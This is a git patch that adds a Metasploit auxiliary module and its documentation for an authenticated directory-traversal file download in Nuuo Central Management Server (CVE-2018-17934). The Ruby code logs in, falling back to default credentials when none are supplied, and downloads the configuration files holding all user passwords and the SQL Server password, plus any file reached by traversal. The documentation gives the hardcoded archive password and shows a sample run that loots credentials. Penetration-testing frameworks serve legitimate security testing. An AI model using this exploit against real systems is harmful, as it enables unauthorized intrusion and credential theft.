From 80147f5ad800a5b4611cbd8b93947c7f7563bbac Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Wed, 20 Feb 2019 07:06:49 -0600 Subject: [PATCH] Land #11293, Add Nuuo CMS file download --- .../gather/nuuo_cms_file_download.md | 71 +++++++++++++++ .../gather/nuuo_cms_file_download.rb | 86 +++++++++++++++++++ 2 files changed, 157 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/nuuo_cms_file_download.md create mode 100644 modules/auxiliary/gather/nuuo_cms_file_download.rb diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md new file mode 100644 index 000000000000..9a8e9f611d3e --- /dev/null +++ b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md @@ -0,0 +1,71 @@ +## Description + +Nuuo CMS Authenticated Arbitrary File Download + +The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below: + +``` +GETCONFIG NUCM/1.0 +FileName: +FileType: +User-Session-No: +``` + +The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail. + +The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including: + +- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password) +- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password +- Any other sensitive files in the drive where CMS Server is installed. + +This module works in the following way: + +- if a SESSION number is present, uses that to login +- if not, tries to authenticate with USERNAME and PASSWORD + +Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf. + +## Vulnerable Application + +[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/) + +The following versions were tested: + + - 1.5.2 OK + - 2.1.0 OK + - 2.3.2 OK + - 2.4.0 OK + - 2.6.0 OK + - 2.9.0 OK + - 2.10.0 OK + - 3.1 OK + - 3.3 OK + - 3.5 OK + +## Scenarios + +### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 + +``` +msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 +rhosts => 172.22.222.200 +msf5 auxiliary(gather/nuuo_cms_file_download) > exploit + +[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg +[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg +[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database. +[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem, +[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit. +[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the +[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them. +[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed! +[*] Auxiliary module execution completed +msf5 auxiliary(gather/nuuo_cms_file_download) > +``` + +## References + +- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 + +- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt diff --git a/modules/auxiliary/gather/nuuo_cms_file_download.rb b/modules/auxiliary/gather/nuuo_cms_file_download.rb new file mode 100644 index 000000000000..33f19cfc8d5c --- /dev/null +++ b/modules/auxiliary/gather/nuuo_cms_file_download.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Nuuo + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download', + 'Description' => %q{ + The Nuuo Central Management Server allows an authenticated user to download files from the + installation folder. This functionality can be abused to obtain administrative credentials, + the SQL Server database password and arbitrary files off the system with directory traversal. + The module will attempt to download CMServer.cfg (the user configuration file with all the user + passwords including the admin one), ServerConfig.cfg (the server configuration file with the + SQL Server password) and a third file if the FILE argument is provided by the user. + The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules + included in Metasploit, these files cannot be decrypted programmatically. The user will + have to open them with zip or a similar program and provide the default password "NUCMS2007!". + This module will either use a provided session number (which can be guessed with an auxiliary + module) or attempt to login using a provided username and password - it will also try the + default credentials if nothing is provided. + All versions of CMS server up to and including 3.5 are vulnerable to this attack. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-17934' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] + + ], + 'Platform' => ['win'], + 'Privileged' => true, + 'DisclosureDate' => 'Oct 11 2018')) + + register_options( + [ + OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \ + the CMS install folder']) + ]) + end + + def download_file(file_name, ctype='application/zip', decrypt=true) + dl_file = nucs_download_file(file_name, decrypt) + file_name = file_name.gsub('..\\', '') + + path = store_loot(file_name, ctype, datastore['RHOST'], + dl_file, file_name, "Nuuo CMS #{file_name} downloaded") + print_good("Downloaded file to #{path}") + end + + + def run + nucs_login + + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') + end + + download_file('CMServer.cfg') + download_file('ServerConfig.cfg') + + # note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed + # see the download_file method for details + print_status('The user and server configuration files were stored in the loot database.') + print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,') + print_status('they cannot be decrypted in Metasploit.') + print_status('You will need to open them up with zip or a similar utility, and use the') + print_status('password NUCMS2007! to unzip them.') + print_status('Annoy the Metasploit developers until this gets fixed!') + + if datastore['FILE'] + filedata = download_file(datastore['FILE'], 'application/octet-stream', false) + end + end +end